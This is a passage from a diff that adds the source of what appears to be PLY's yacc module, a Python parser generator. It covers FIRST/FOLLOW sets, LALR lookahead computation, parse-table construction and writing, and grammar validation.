FIRST1(X) for all symbols + # ------------------------------------------------------------------------- + def compute_first(self): + if self.First: + return self.First + + # Terminals: + for t in self.Terminals: + self.First[t] = [t] + + self.First['$end'] = ['$end'] + + # Nonterminals: + + # Initialize to the empty set: + for n in self.Nonterminals: + self.First[n] = [] + + # Then propagate symbols until no change: + while True: + some_change = False + for n in self.Nonterminals: + for p in self.Prodnames[n]: + for f in self._first(p.prod): + if f not in self.First[n]: + self.First[n].append(f) + some_change = True + if not some_change: + break + + return self.First + + # --------------------------------------------------------------------- + # compute_follow() + # + # Computes all of the follow sets for every non-terminal symbol. The + # follow set is the set of all symbols that might follow a given + # non-terminal. See the Dragon book, 2nd Ed. p. 189. + # --------------------------------------------------------------------- + def compute_follow(self, start=None): + # If already computed, return the result + if self.Follow: + return self.Follow + + # If first sets not computed yet, do that first. + if not self.First: + self.compute_first() + + # Add '$end' to the follow list of the start symbol + for k in self.Nonterminals: + self.Follow[k] = [] + + if not start: + start = self.Productions[1].name + + self.Follow[start] = ['$end'] + + while True: + didadd = False + for p in self.Productions[1:]: + # Here is the production set + for i, B in enumerate(p.prod): + if B in self.Nonterminals: + # Okay. We got a non-terminal in a production + fst = self._first(p.prod[i+1:]) + hasempty = False + for f in fst: + if f != '' and f not in self.Follow[B]: + self.Follow[B].append(f) + didadd = True + if f == '': + hasempty = True + if hasempty or i == (len(p.prod)-1): + # Add elements of follow(a) to follow(b) + for f in self.Follow[p.name]: + if f not in self.Follow[B]: + self.Follow[B].append(f) + didadd = True + if not didadd: + break + return self.Follow + + + # ----------------------------------------------------------------------------- + # build_lritems() + # + # This function walks the list of productions and builds a complete set of the + # LR items. The LR items are stored in two ways: First, they are uniquely + # numbered and placed in the list _lritems. Second, a linked list of LR items + # is built for each production. For example: + # + # E -> E PLUS E + # + # Creates the list + # + # [E -> . E PLUS E, E -> E . PLUS E, E -> E PLUS . E, E -> E PLUS E . ] + # ----------------------------------------------------------------------------- + + def build_lritems(self): + for p in self.Productions: + lastlri = p + i = 0 + lr_items = [] + while True: + if i > len(p): + lri = None + else: + lri = LRItem(p, i) + # Precompute the list of productions immediately following + try: + lri.lr_after = self.Prodnames[lri.prod[i+1]] + except (IndexError, KeyError): + lri.lr_after = [] + try: + lri.lr_before = lri.prod[i-1] + except IndexError: + lri.lr_before = None + + lastlri.lr_next = lri + if not lri: + break + lr_items.append(lri) + lastlri = lri + i += 1 + p.lr_items = lr_items + +# ----------------------------------------------------------------------------- +# == Class LRTable == +# +# This basic class represents a basic table of LR parsing information. +# Methods for generating the tables are not defined here. They are defined +# in the derived class LRGeneratedTable. +# ----------------------------------------------------------------------------- + +class VersionError(YaccError): + pass + +class LRTable(object): + def __init__(self): + self.lr_action = None + self.lr_goto = None + self.lr_productions = None + self.lr_method = None + + def read_table(self, module): + if isinstance(module, types.ModuleType): + parsetab = module + else: + exec('import %s' % module) + parsetab = sys.modules[module] + + if parsetab._tabversion != __tabversion__: + raise VersionError('yacc table file version is out of date') + + self.lr_action = parsetab._lr_action + self.lr_goto = parsetab._lr_goto + + self.lr_productions = [] + for p in parsetab._lr_productions: + self.lr_productions.append(MiniProduction(*p)) + + self.lr_method = parsetab._lr_method + return parsetab._lr_signature + + def read_pickle(self, filename): + try: + import cPickle as pickle + except ImportError: + import pickle + + if not os.path.exists(filename): + raise ImportError + + in_f = open(filename, 'rb') + + tabversion = pickle.load(in_f) + if tabversion != __tabversion__: + raise VersionError('yacc table file version is out of date') + self.lr_method = pickle.load(in_f) + signature = pickle.load(in_f) + self.lr_action = pickle.load(in_f) + self.lr_goto = pickle.load(in_f) + productions = pickle.load(in_f) + + self.lr_productions = [] + for p in productions: + self.lr_productions.append(MiniProduction(*p)) + + in_f.close() + return signature + + # Bind all production function names to callable objects in pdict + def bind_callables(self, pdict): + for p in self.lr_productions: + p.bind(pdict) + + +# ----------------------------------------------------------------------------- +# === LR Generator === +# +# The following classes and functions are used to generate LR parsing tables on +# a grammar. +# ----------------------------------------------------------------------------- + +# ----------------------------------------------------------------------------- +# digraph() +# traverse() +# +# The following two functions are used to compute set valued functions +# of the form: +# +# F(x) = F'(x) U U{F(y) | x R y} +# +# This is used to compute the values of Read() sets as well as FOLLOW sets +# in LALR(1) generation. +# +# Inputs: X - An input set +# R - A relation +# FP - Set-valued function +# ------------------------------------------------------------------------------ + +def digraph(X, R, FP): + N = {} + for x in X: + N[x] = 0 + stack = [] + F = {} + for x in X: + if N[x] == 0: + traverse(x, N, stack, F, X, R, FP) + return F + +def traverse(x, N, stack, F, X, R, FP): + stack.append(x) + d = len(stack) + N[x] = d + F[x] = FP(x) # F(X) <- F'(x) + + rel = R(x) # Get y's related to x + for y in rel: + if N[y] == 0: + traverse(y, N, stack, F, X, R, FP) + N[x] = min(N[x], N[y]) + for a in F.get(y, []): + if a not in F[x]: + F[x].append(a) + if N[x] == d: + N[stack[-1]] = MAXINT + F[stack[-1]] = F[x] + element = stack.pop() + while element != x: + N[stack[-1]] = MAXINT + F[stack[-1]] = F[x] + element = stack.pop() + +class LALRError(YaccError): + pass + +# ----------------------------------------------------------------------------- +# == LRGeneratedTable == +# +# This class implements the LR table generation algorithm. There are no +# public methods except for write() +# ----------------------------------------------------------------------------- + +class LRGeneratedTable(LRTable): + def __init__(self, grammar, method='LALR', log=None): + if method not in ['SLR', 'LALR']: + raise LALRError('Unsupported method %s' % method) + + self.grammar = grammar + self.lr_method = method + + # Set up the logger + if not log: + log = NullLogger() + self.log = log + + # Internal attributes + self.lr_action = {} # Action table + self.lr_goto = {} # Goto table + self.lr_productions = grammar.Productions # Copy of grammar Production array + self.lr_goto_cache = {} # Cache of computed gotos + self.lr0_cidhash = {} # Cache of closures + + self._add_count = 0 # Internal counter used to detect cycles + + # Diagonistic information filled in by the table generator + self.sr_conflict = 0 + self.rr_conflict = 0 + self.conflicts = [] # List of conflicts + + self.sr_conflicts = [] + self.rr_conflicts = [] + + # Build the tables + self.grammar.build_lritems() + self.grammar.compute_first() + self.grammar.compute_follow() + self.lr_parse_table() + + # Compute the LR(0) closure operation on I, where I is a set of LR(0) items. + + def lr0_closure(self, I): + self._add_count += 1 + + # Add everything in I to J + J = I[:] + didadd = True + while didadd: + didadd = False + for j in J: + for x in j.lr_after: + if getattr(x, 'lr0_added', 0) == self._add_count: + continue + # Add B --> .G to J + J.append(x.lr_next) + x.lr0_added = self._add_count + didadd = True + + return J + + # Compute the LR(0) goto function goto(I,X) where I is a set + # of LR(0) items and X is a grammar symbol. This function is written + # in a way that guarantees uniqueness of the generated goto sets + # (i.e. the same goto set will never be returned as two different Python + # objects). With uniqueness, we can later do fast set comparisons using + # id(obj) instead of element-wise comparison. + + def lr0_goto(self, I, x): + # First we look for a previously cached entry + g = self.lr_goto_cache.get((id(I), x)) + if g: + return g + + # Now we generate the goto set in a way that guarantees uniqueness + # of the result + + s = self.lr_goto_cache.get(x) + if not s: + s = {} + self.lr_goto_cache[x] = s + + gs = [] + for p in I: + n = p.lr_next + if n and n.lr_before == x: + s1 = s.get(id(n)) + if not s1: + s1 = {} + s[id(n)] = s1 + gs.append(n) + s = s1 + g = s.get('$end') + if not g: + if gs: + g = self.lr0_closure(gs) + s['$end'] = g + else: + s['$end'] = gs + self.lr_goto_cache[(id(I), x)] = g + return g + + # Compute the LR(0) sets of item function + def lr0_items(self): + C = [self.lr0_closure([self.grammar.Productions[0].lr_next])] + i = 0 + for I in C: + self.lr0_cidhash[id(I)] = i + i += 1 + + # Loop over the items in C and each grammar symbols + i = 0 + while i < len(C): + I = C[i] + i += 1 + + # Collect all of the symbols that could possibly be in the goto(I,X) sets + asyms = {} + for ii in I: + for s in ii.usyms: + asyms[s] = None + + for x in asyms: + g = self.lr0_goto(I, x) + if not g or id(g) in self.lr0_cidhash: + continue + self.lr0_cidhash[id(g)] = len(C) + C.append(g) + + return C + + # ----------------------------------------------------------------------------- + # ==== LALR(1) Parsing ==== + # + # LALR(1) parsing is almost exactly the same as SLR except that instead of + # relying upon Follow() sets when performing reductions, a more selective + # lookahead set that incorporates the state of the LR(0) machine is utilized. + # Thus, we mainly just have to focus on calculating the lookahead sets. + # + # The method used here is due to DeRemer and Pennelo (1982). + # + # DeRemer, F. L., and T. J. Pennelo: "Efficient Computation of LALR(1) + # Lookahead Sets", ACM Transactions on Programming Languages and Systems, + # Vol. 4, No. 4, Oct. 1982, pp. 615-649 + # + # Further details can also be found in: + # + # J. Tremblay and P. Sorenson, "The Theory and Practice of Compiler Writing", + # McGraw-Hill Book Company, (1985). + # + # ----------------------------------------------------------------------------- + + # ----------------------------------------------------------------------------- + # compute_nullable_nonterminals() + # + # Creates a dictionary containing all of the non-terminals that might produce + # an empty production. + # ----------------------------------------------------------------------------- + + def compute_nullable_nonterminals(self): + nullable = set() + num_nullable = 0 + while True: + for p in self.grammar.Productions[1:]: + if p.len == 0: + nullable.add(p.name) + continue + for t in p.prod: + if t not in nullable: + break + else: + nullable.add(p.name) + if len(nullable) == num_nullable: + break + num_nullable = len(nullable) + return nullable + + # ----------------------------------------------------------------------------- + # find_nonterminal_trans(C) + # + # Given a set of LR(0) items, this functions finds all of the non-terminal + # transitions. These are transitions in which a dot appears immediately before + # a non-terminal. Returns a list of tuples of the form (state,N) where state + # is the state number and N is the nonterminal symbol. + # + # The input C is the set of LR(0) items. + # ----------------------------------------------------------------------------- + + def find_nonterminal_transitions(self, C): + trans = [] + for stateno, state in enumerate(C): + for p in state: + if p.lr_index < p.len - 1: + t = (stateno, p.prod[p.lr_index+1]) + if t[1] in self.grammar.Nonterminals: + if t not in trans: + trans.append(t) + return trans + + # ----------------------------------------------------------------------------- + # dr_relation() + # + # Computes the DR(p,A) relationships for non-terminal transitions. The input + # is a tuple (state,N) where state is a number and N is a nonterminal symbol. + # + # Returns a list of terminals. + # ----------------------------------------------------------------------------- + + def dr_relation(self, C, trans, nullable): + dr_set = {} + state, N = trans + terms = [] + + g = self.lr0_goto(C[state], N) + for p in g: + if p.lr_index < p.len - 1: + a = p.prod[p.lr_index+1] + if a in self.grammar.Terminals: + if a not in terms: + terms.append(a) + + # This extra bit is to handle the start state + if state == 0 and N == self.grammar.Productions[0].prod[0]: + terms.append('$end') + + return terms + + # ----------------------------------------------------------------------------- + # reads_relation() + # + # Computes the READS() relation (p,A) READS (t,C). + # ----------------------------------------------------------------------------- + + def reads_relation(self, C, trans, empty): + # Look for empty transitions + rel = [] + state, N = trans + + g = self.lr0_goto(C[state], N) + j = self.lr0_cidhash.get(id(g), -1) + for p in g: + if p.lr_index < p.len - 1: + a = p.prod[p.lr_index + 1] + if a in empty: + rel.append((j, a)) + + return rel + + # ----------------------------------------------------------------------------- + # compute_lookback_includes() + # + # Determines the lookback and includes relations + # + # LOOKBACK: + # + # This relation is determined by running the LR(0) state machine forward. + # For example, starting with a production "N : . A B C", we run it forward + # to obtain "N : A B C ." We then build a relationship between this final + # state and the starting state. These relationships are stored in a dictionary + # lookdict. + # + # INCLUDES: + # + # Computes the INCLUDE() relation (p,A) INCLUDES (p',B). + # + # This relation is used to determine non-terminal transitions that occur + # inside of other non-terminal transition states. (p,A) INCLUDES (p', B) + # if the following holds: + # + # B -> LAT, where T -> epsilon and p' -L-> p + # + # L is essentially a prefix (which may be empty), T is a suffix that must be + # able to derive an empty string. State p' must lead to state p with the string L. + # + # ----------------------------------------------------------------------------- + + def compute_lookback_includes(self, C, trans, nullable): + lookdict = {} # Dictionary of lookback relations + includedict = {} # Dictionary of include relations + + # Make a dictionary of non-terminal transitions + dtrans = {} + for t in trans: + dtrans[t] = 1 + + # Loop over all transitions and compute lookbacks and includes + for state, N in trans: + lookb = [] + includes = [] + for p in C[state]: + if p.name != N: + continue + + # Okay, we have a name match. We now follow the production all the way + # through the state machine until we get the . on the right hand side + + lr_index = p.lr_index + j = state + while lr_index < p.len - 1: + lr_index = lr_index + 1 + t = p.prod[lr_index] + + # Check to see if this symbol and state are a non-terminal transition + if (j, t) in dtrans: + # Yes. Okay, there is some chance that this is an includes relation + # the only way to know for certain is whether the rest of the + # production derives empty + + li = lr_index + 1 + while li < p.len: + if p.prod[li] in self.grammar.Terminals: + break # No forget it + if p.prod[li] not in nullable: + break + li = li + 1 + else: + # Appears to be a relation between (j,t) and (state,N) + includes.append((j, t)) + + g = self.lr0_goto(C[j], t) # Go to next set + j = self.lr0_cidhash.get(id(g), -1) # Go to next state + + # When we get here, j is the final state, now we have to locate the production + for r in C[j]: + if r.name != p.name: + continue + if r.len != p.len: + continue + i = 0 + # This look is comparing a production ". A B C" with "A B C ." + while i < r.lr_index: + if r.prod[i] != p.prod[i+1]: + break + i = i + 1 + else: + lookb.append((j, r)) + for i in includes: + if i not in includedict: + includedict[i] = [] + includedict[i].append((state, N)) + lookdict[(state, N)] = lookb + + return lookdict, includedict + + # ----------------------------------------------------------------------------- + # compute_read_sets() + # + # Given a set of LR(0) items, this function computes the read sets. + # + # Inputs: C = Set of LR(0) items + # ntrans = Set of nonterminal transitions + # nullable = Set of empty transitions + # + # Returns a set containing the read sets + # ----------------------------------------------------------------------------- + + def compute_read_sets(self, C, ntrans, nullable): + FP = lambda x: self.dr_relation(C, x, nullable) + R = lambda x: self.reads_relation(C, x, nullable) + F = digraph(ntrans, R, FP) + return F + + # ----------------------------------------------------------------------------- + # compute_follow_sets() + # + # Given a set of LR(0) items, a set of non-terminal transitions, a readset, + # and an include set, this function computes the follow sets + # + # Follow(p,A) = Read(p,A) U U {Follow(p',B) | (p,A) INCLUDES (p',B)} + # + # Inputs: + # ntrans = Set of nonterminal transitions + # readsets = Readset (previously computed) + # inclsets = Include sets (previously computed) + # + # Returns a set containing the follow sets + # ----------------------------------------------------------------------------- + + def compute_follow_sets(self, ntrans, readsets, inclsets): + FP = lambda x: readsets[x] + R = lambda x: inclsets.get(x, []) + F = digraph(ntrans, R, FP) + return F + + # ----------------------------------------------------------------------------- + # add_lookaheads() + # + # Attaches the lookahead symbols to grammar rules. + # + # Inputs: lookbacks - Set of lookback relations + # followset - Computed follow set + # + # This function directly attaches the lookaheads to productions contained + # in the lookbacks set + # ----------------------------------------------------------------------------- + + def add_lookaheads(self, lookbacks, followset): + for trans, lb in lookbacks.items(): + # Loop over productions in lookback + for state, p in lb: + if state not in p.lookaheads: + p.lookaheads[state] = [] + f = followset.get(trans, []) + for a in f: + if a not in p.lookaheads[state]: + p.lookaheads[state].append(a) + + # ----------------------------------------------------------------------------- + # add_lalr_lookaheads() + # + # This function does all of the work of adding lookahead information for use + # with LALR parsing + # ----------------------------------------------------------------------------- + + def add_lalr_lookaheads(self, C): + # Determine all of the nullable nonterminals + nullable = self.compute_nullable_nonterminals() + + # Find all non-terminal transitions + trans = self.find_nonterminal_transitions(C) + + # Compute read sets + readsets = self.compute_read_sets(C, trans, nullable) + + # Compute lookback/includes relations + lookd, included = self.compute_lookback_includes(C, trans, nullable) + + # Compute LALR FOLLOW sets + followsets = self.compute_follow_sets(trans, readsets, included) + + # Add all of the lookaheads + self.add_lookaheads(lookd, followsets) + + # ----------------------------------------------------------------------------- + # lr_parse_table() + # + # This function constructs the parse tables for SLR or LALR + # ----------------------------------------------------------------------------- + def lr_parse_table(self): + Productions = self.grammar.Productions + Precedence = self.grammar.Precedence + goto = self.lr_goto # Goto array + action = self.lr_action # Action array + log = self.log # Logger for output + + actionp = {} # Action production array (temporary) + + log.info('Parsing method: %s', self.lr_method) + + # Step 1: Construct C = { I0, I1, ... IN}, collection of LR(0) items + # This determines the number of states + + C = self.lr0_items() + + if self.lr_method == 'LALR': + self.add_lalr_lookaheads(C) + + # Build the parser table, state by state + st = 0 + for I in C: + # Loop over each production in I + actlist = [] # List of actions + st_action = {} + st_actionp = {} + st_goto = {} + log.info('') + log.info('state %d', st) + log.info('') + for p in I: + log.info(' (%d) %s', p.number, p) + log.info('') + + for p in I: + if p.len == p.lr_index + 1: + if p.name == "S'": + # Start symbol. Accept! + st_action['$end'] = 0 + st_actionp['$end'] = p + else: + # We are at the end of a production. Reduce! + if self.lr_method == 'LALR': + laheads = p.lookaheads[st] + else: + laheads = self.grammar.Follow[p.name] + for a in laheads: + actlist.append((a, p, 'reduce using rule %d (%s)' % (p.number, p))) + r = st_action.get(a) + if r is not None: + # Whoa. Have a shift/reduce or reduce/reduce conflict + if r > 0: + # Need to decide on shift or reduce here + # By default we favor shifting. Need to add + # some precedence rules here. + + # Shift precedence comes from the token + sprec, slevel = Precedence.get(a, ('right', 0)) + + # Reduce precedence comes from rule being reduced (p) + rprec, rlevel = Productions[p.number].prec + + if (slevel < rlevel) or ((slevel == rlevel) and (rprec == 'left')): + # We really need to reduce here. + st_action[a] = -p.number + st_actionp[a] = p + if not slevel and not rlevel: + log.info(' ! shift/reduce conflict for %s resolved as reduce', a) + self.sr_conflicts.append((st, a, 'reduce')) + Productions[p.number].reduced += 1 + elif (slevel == rlevel) and (rprec == 'nonassoc'): + st_action[a] = None + else: + # Hmmm. Guess we'll keep the shift + if not rlevel: + log.info(' ! shift/reduce conflict for %s resolved as shift', a) + self.sr_conflicts.append((st, a, 'shift')) + elif r < 0: + # Reduce/reduce conflict. In this case, we favor the rule + # that was defined first in the grammar file + oldp = Productions[-r] + pp = Productions[p.number] + if oldp.line > pp.line: + st_action[a] = -p.number + st_actionp[a] = p + chosenp, rejectp = pp, oldp + Productions[p.number].reduced += 1 + Productions[oldp.number].reduced -= 1 + else: + chosenp, rejectp = oldp, pp + self.rr_conflicts.append((st, chosenp, rejectp)) + log.info(' ! reduce/reduce conflict for %s resolved using rule %d (%s)', + a, st_actionp[a].number, st_actionp[a]) + else: + raise LALRError('Unknown conflict in state %d' % st) + else: + st_action[a] = -p.number + st_actionp[a] = p + Productions[p.number].reduced += 1 + else: + i = p.lr_index + a = p.prod[i+1] # Get symbol right after the "." + if a in self.grammar.Terminals: + g = self.lr0_goto(I, a) + j = self.lr0_cidhash.get(id(g), -1) + if j >= 0: + # We are in a shift state + actlist.append((a, p, 'shift and go to state %d' % j)) + r = st_action.get(a) + if r is not None: + # Whoa have a shift/reduce or shift/shift conflict + if r > 0: + if r != j: + raise LALRError('Shift/shift conflict in state %d' % st) + elif r < 0: + # Do a precedence check. + # - if precedence of reduce rule is higher, we reduce. + # - if precedence of reduce is same and left assoc, we reduce. + # - otherwise we shift + + # Shift precedence comes from the token + sprec, slevel = Precedence.get(a, ('right', 0)) + + # Reduce precedence comes from the rule that could have been reduced + rprec, rlevel = Productions[st_actionp[a].number].prec + + if (slevel > rlevel) or ((slevel == rlevel) and (rprec == 'right')): + # We decide to shift here... highest precedence to shift + Productions[st_actionp[a].number].reduced -= 1 + st_action[a] = j + st_actionp[a] = p + if not rlevel: + log.info(' ! shift/reduce conflict for %s resolved as shift', a) + self.sr_conflicts.append((st, a, 'shift')) + elif (slevel == rlevel) and (rprec == 'nonassoc'): + st_action[a] = None + else: + # Hmmm. Guess we'll keep the reduce + if not slevel and not rlevel: + log.info(' ! shift/reduce conflict for %s resolved as reduce', a) + self.sr_conflicts.append((st, a, 'reduce')) + + else: + raise LALRError('Unknown conflict in state %d' % st) + else: + st_action[a] = j + st_actionp[a] = p + + # Print the actions associated with each terminal + _actprint = {} + for a, p, m in actlist: + if a in st_action: + if p is st_actionp[a]: + log.info(' %-15s %s', a, m) + _actprint[(a, m)] = 1 + log.info('') + # Print the actions that were not used. (debugging) + not_used = 0 + for a, p, m in actlist: + if a in st_action: + if p is not st_actionp[a]: + if not (a, m) in _actprint: + log.debug(' ! %-15s [ %s ]', a, m) + not_used = 1 + _actprint[(a, m)] = 1 + if not_used: + log.debug('') + + # Construct the goto table for this state + + nkeys = {} + for ii in I: + for s in ii.usyms: + if s in self.grammar.Nonterminals: + nkeys[s] = None + for n in nkeys: + g = self.lr0_goto(I, n) + j = self.lr0_cidhash.get(id(g), -1) + if j >= 0: + st_goto[n] = j + log.info(' %-30s shift and go to state %d', n, j) + + action[st] = st_action + actionp[st] = st_actionp + goto[st] = st_goto + st += 1 + + # ----------------------------------------------------------------------------- + # write() + # + # This function writes the LR parsing tables to a file + # ----------------------------------------------------------------------------- + + def write_table(self, tabmodule, outputdir='', signature=''): + if isinstance(tabmodule, types.ModuleType): + raise IOError("Won't overwrite existing tabmodule") + + basemodulename = tabmodule.split('.')[-1] + filename = os.path.join(outputdir, basemodulename) + '.py' + try: + f = open(filename, 'w') + + f.write(''' +# %s +# This file is automatically generated. Do not edit. +_tabversion = %r + +_lr_method = %r + +_lr_signature = %r + ''' % (os.path.basename(filename), __tabversion__, self.lr_method, signature)) + + # Change smaller to 0 to go back to original tables + smaller = 1 + + # Factor out names to try and make smaller + if smaller: + items = {} + + for s, nd in self.lr_action.items(): + for name, v in nd.items(): + i = items.get(name) + if not i: + i = ([], []) + items[name] = i + i[0].append(s) + i[1].append(v) + + f.write('\n_lr_action_items = {') + for k, v in items.items(): + f.write('%r:([' % k) + for i in v[0]: + f.write('%r,' % i) + f.write('],[') + for i in v[1]: + f.write('%r,' % i) + + f.write(']),') + f.write('}\n') + + f.write(''' +_lr_action = {} +for _k, _v in _lr_action_items.items(): + for _x,_y in zip(_v[0],_v[1]): + if not _x in _lr_action: _lr_action[_x] = {} + _lr_action[_x][_k] = _y +del _lr_action_items +''') + + else: + f.write('\n_lr_action = { ') + for k, v in self.lr_action.items(): + f.write('(%r,%r):%r,' % (k[0], k[1], v)) + f.write('}\n') + + if smaller: + # Factor out names to try and make smaller + items = {} + + for s, nd in self.lr_goto.items(): + for name, v in nd.items(): + i = items.get(name) + if not i: + i = ([], []) + items[name] = i + i[0].append(s) + i[1].append(v) + + f.write('\n_lr_goto_items = {') + for k, v in items.items(): + f.write('%r:([' % k) + for i in v[0]: + f.write('%r,' % i) + f.write('],[') + for i in v[1]: + f.write('%r,' % i) + + f.write(']),') + f.write('}\n') + + f.write(''' +_lr_goto = {} +for _k, _v in _lr_goto_items.items(): + for _x, _y in zip(_v[0], _v[1]): + if not _x in _lr_goto: _lr_goto[_x] = {} + _lr_goto[_x][_k] = _y +del _lr_goto_items +''') + else: + f.write('\n_lr_goto = { ') + for k, v in self.lr_goto.items(): + f.write('(%r,%r):%r,' % (k[0], k[1], v)) + f.write('}\n') + + # Write production table + f.write('_lr_productions = [\n') + for p in self.lr_productions: + if p.func: + f.write(' (%r,%r,%d,%r,%r,%d),\n' % (p.str, p.name, p.len, + p.func, os.path.basename(p.file), p.line)) + else: + f.write(' (%r,%r,%d,None,None,None),\n' % (str(p), p.name, p.len)) + f.write(']\n') + f.close() + + except IOError as e: + raise + + + # ----------------------------------------------------------------------------- + # pickle_table() + # + # This function pickles the LR parsing tables to a supplied file object + # ----------------------------------------------------------------------------- + + def pickle_table(self, filename, signature=''): + try: + import cPickle as pickle + except ImportError: + import pickle + with open(filename, 'wb') as outf: + pickle.dump(__tabversion__, outf, pickle_protocol) + pickle.dump(self.lr_method, outf, pickle_protocol) + pickle.dump(signature, outf, pickle_protocol) + pickle.dump(self.lr_action, outf, pickle_protocol) + pickle.dump(self.lr_goto, outf, pickle_protocol) + + outp = [] + for p in self.lr_productions: + if p.func: + outp.append((p.str, p.name, p.len, p.func, os.path.basename(p.file), p.line)) + else: + outp.append((str(p), p.name, p.len, None, None, None)) + pickle.dump(outp, outf, pickle_protocol) + +# ----------------------------------------------------------------------------- +# === INTROSPECTION === +# +# The following functions and classes are used to implement the PLY +# introspection features followed by the yacc() function itself. +# ----------------------------------------------------------------------------- + +# ----------------------------------------------------------------------------- +# get_caller_module_dict() +# +# This function returns a dictionary containing all of the symbols defined within +# a caller further down the call stack. This is used to get the environment +# associated with the yacc() call if none was provided. +# ----------------------------------------------------------------------------- + +def get_caller_module_dict(levels): + f = sys._getframe(levels) + ldict = f.f_globals.copy() + if f.f_globals != f.f_locals: + ldict.update(f.f_locals) + return ldict + +# ----------------------------------------------------------------------------- +# parse_grammar() +# +# This takes a raw grammar rule string and parses it into production data +# ----------------------------------------------------------------------------- +def parse_grammar(doc, file, line): + grammar = [] + # Split the doc string into lines + pstrings = doc.splitlines() + lastp = None + dline = line + for ps in pstrings: + dline += 1 + p = ps.split() + if not p: + continue + try: + if p[0] == '|': + # This is a continuation of a previous rule + if not lastp: + raise SyntaxError("%s:%d: Misplaced '|'" % (file, dline)) + prodname = lastp + syms = p[1:] + else: + prodname = p[0] + lastp = prodname + syms = p[2:] + assign = p[1] + if assign != ':' and assign != '::=': + raise SyntaxError("%s:%d: Syntax error. Expected ':'" % (file, dline)) + + grammar.append((file, dline, prodname, syms)) + except SyntaxError: + raise + except Exception: + raise SyntaxError('%s:%d: Syntax error in rule %r' % (file, dline, ps.strip())) + + return grammar + +# ----------------------------------------------------------------------------- +# ParserReflect() +# +# This class represents information extracted for building a parser including +# start symbol, error function, tokens, precedence list, action functions, +# etc. +# ----------------------------------------------------------------------------- +class ParserReflect(object): + def __init__(self, pdict, log=None): + self.pdict = pdict + self.start = None + self.error_func = None + self.tokens = None + self.modules = set() + self.grammar = [] + self.error = False + + if log is None: + self.log = PlyLogger(sys.stderr) + else: + self.log = log + + # Get all of the basic information + def get_all(self): + self.get_start() + self.get_error_func() + self.get_tokens() + self.get_precedence() + self.get_pfunctions() + + # Validate all of the information + def validate_all(self): + self.validate_start() + self.validate_error_func() + self.validate_tokens() + self.validate_precedence() + self.validate_pfunctions() + self.validate_modules() + return self.error + + # Compute a signature over the grammar + def signature(self): + parts = [] + try: + if self.start: + parts.append(self.start) + if self.prec: + parts.append(''.join([''.join(p) for p in self.prec])) + if self.tokens: + parts.append(' '.join(self.tokens)) + for f in self.pfuncs: + if f[3]: + parts.append(f[3]) + except (TypeError, ValueError): + pass + return ''.join(parts) + + # ----------------------------------------------------------------------------- + # validate_modules() + # + # This method checks to see if there are duplicated p_rulename() functions + # in the parser module file. Without this function, it is really easy for + # users to make mistakes by cutting and pasting code fragments (and it's a real + # bugger to try and figure out why the resulting parser doesn't work). Therefore, + # we just do a little regular expression pattern matching of def statements + # to try and detect duplicates. + # ----------------------------------------------------------------------------- + + def validate_modules(self): + # Match def p_funcname( + fre = re.compile(r'\s*def\s+(p_[a-zA-Z_0-9]*)\(') + + for module in self.modules: + try: + lines, linen = inspect.getsourcelines(module) + except IOError: + continue + + counthash = {} + for linen, line in enumerate(lines): + linen += 1 + m = fre.match(line) + if m: + name = m.group(1) + prev = counthash.get(name) + if not prev: + counthash[name] = linen + else: + filename = inspect.getsourcefile(module) + self.log.warning('%s:%d: Function %s redefined. Previously defined on line %d', + filename, linen, name, prev) + + # Get the start symbol + def get_start(self): + self.start = self.pdict.get('start') + + # Validate the start symbol + def validate_start(self): + if self.start is not None: + if not isinstance(self.start, string_types): + self.log.error("'start' must be a string") + + # Look for error handler + def get_error_func(self): + self.error_func = self.pdict.get('p_error') + + # Validate the error function + def validate_error_func(self): + if self.error_func: + if isinstance(self.error_func, types.FunctionType): + ismethod = 0 + elif isinstance(self.error_func, types.MethodType): + ismethod = 1 + else: + self.log.error("'p_error' defined, but is not a function or method") + self.error = True + return + + eline = self.error_func.__code__.co_firstlineno + efile = self.error_func.__code__.co_filename + module = inspect.getmodule(self.error_func) + self.modules.add(module) + + argcount = self.error_func.__code__.co_argcount - ismethod + if argcount != 1: + self.log.error('%s:%d: p_error() requires 1 argument', efile, eline) + self.error = True + + # Get the tokens map + def get_tokens(self): + tokens = self.pdict.get('tokens') + if not tokens: + self.log.error('No token list is defined') + self.error = True + return + + if not isinstance(tokens, (list, tuple)): + self.log.error('tokens must be a list or tuple') + self.error = True + return + + if not tokens: + self.log.error('tokens is empty') + self.error = True + return + + self.tokens = tokens + + # Validate the tokens + def validate_tokens(self): + # Validate the tokens. + if 'error' in self.tokens: + self.log.error("Illegal token name 'error'. Is a reserved word") + self.error = True + return + + terminals = set() + for n in self.tokens: + if n in terminals: + self.log.warning('Token %r multiply defined', n) + terminals.add(n) + + # Get the precedence map (if any) + def get_precedence(self): + self.prec = self.pdict.get('precedence') + + # Validate and parse the precedence map + def validate_precedence(self): + preclist = [] + if self.prec: + if not isinstance(self.prec, (list, tuple)): + self.log.error('precedence must be a list or tuple') + self.error = True + return + for level, p in enumerate(self.prec): + if not isinstance(p, (list, tuple)): + self.log.error('Bad precedence table') + self.error = True + return + + if len(p) < 2: + self.log.error('Malformed precedence entry %s. Must be (assoc, term, ..., term)', p) + self.error = True + return + assoc = p[0] + if not isinstance(assoc, string_types): + self.log.error('precedence associativity must be a string') + self.error = True + return + for term in p[1:]: + if not isinstance(term, string_types): + self.log.error('precedence items must be strings') + self.error = True + return + preclist.append((term, assoc, level+1)) + self.preclist = preclist + + # Get all p_functions from the grammar + def get_pfunctions(self): + p_functions = [] + for name, item in self.pdict.items(): + if not name.startswith('p_') or name == 'p_error': + continue + if isinstance(item, (types.FunctionType, types.MethodType)): + line = getattr(item, 'co_firstlineno', item.__code__.co_firstlineno) + module = inspect.getmodule(item) + p_functions.append((line, module, name, item.__doc__)) + + # Sort all of the actions by line number; make sure to stringify + # modules to make them sortable, since `line` may not uniquely sort all + # p functions + p_functions.sort(key=lambda p_function: ( + p_function[0], + str(p_function[1]), + p_function[2], + p_function[3])) + self.pfuncs = p_functions + + # Validate all of the p_functions + def validate_pfunctions(self): + grammar = [] + # Check for non-empty symbols + if len(self.pfuncs) == 0: + self.log.error('no rules of the form p_rulename are defined') + self.error = True + return + + for line, module, name, doc in self.pfuncs: + file = inspect.getsourcefile(module) + func = self.pdict[name] + if isinstance(func, types.MethodType): + reqargs = 2 + else: + reqargs = 1 + if func.__code__.co_argcount > reqargs: + self.log.error('%s:%d: Rule %r has too many arguments', file, line, func.__name__) + self.error = True + elif func.__code__.co_argcount < reqargs: + self.log.error('%s:%d: Rule %r requires an argument', file, line, func.__name__) + self.error = True + elif not func.__doc__: + self.log.warning('%s:%d: No documentation string 